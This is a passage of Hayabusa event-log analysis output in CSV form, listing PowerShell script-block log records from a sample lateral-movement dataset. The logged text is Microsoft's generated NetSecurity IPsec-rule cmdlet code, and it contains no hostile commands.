$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { 
[object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
